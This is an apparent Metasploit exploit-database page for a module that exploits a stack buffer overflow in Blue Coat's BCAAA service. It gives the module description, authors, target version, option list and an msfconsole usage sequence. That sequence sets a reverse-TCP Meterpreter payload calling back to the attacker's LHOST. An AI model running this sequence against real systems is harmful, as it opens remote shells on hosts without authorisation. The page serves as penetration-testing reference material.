Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow | Metasploit Exploit Database (DB)

Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow

This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102), which comes as part of the Blue Coat Authentication proxy. Please note that by default, this exploit will attempt up to three times in order to successfully gain remote code execution (in some cases, it takes as many as five times). This can cause your activity to look even more suspicious. To modify the number of exploit attempts, set the ATTEMPTS option.

Search Other Modules


Exploit Rank

  • Good

Exploit Authors

  • Paul Harrington < >
  • Travis Warren < >
  • sinn3r < sinn3r [at] metasploit.com >

Vulnerability References


Exploit Targets

  • 0 - BCAAA Version 5.4.6.1.54128 (default)

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/misc/bcaaa_bof
msf exploit(bcaaa_bof) > show payloads
msf exploit(bcaaa_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(bcaaa_bof) > set LHOST [MY IP ADDRESS]
msf exploit(bcaaa_bof) > set RHOST [TARGET IP]
msf exploit(bcaaa_bof) > exploit


Exploit Module Options

ATTEMPTS Number of attempts to try to exploit (default: 3)
RHOST The target address
RPORT The target port (default: 16102)
CHOST The local client address
CPORT The local client port
ConnectTimeout Maximum number of seconds to establish a TCP connection
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
Proxies Use a proxy chain
SSL Negotiate SSL for outgoing connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session
TCP::max_send_size Maxiumum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)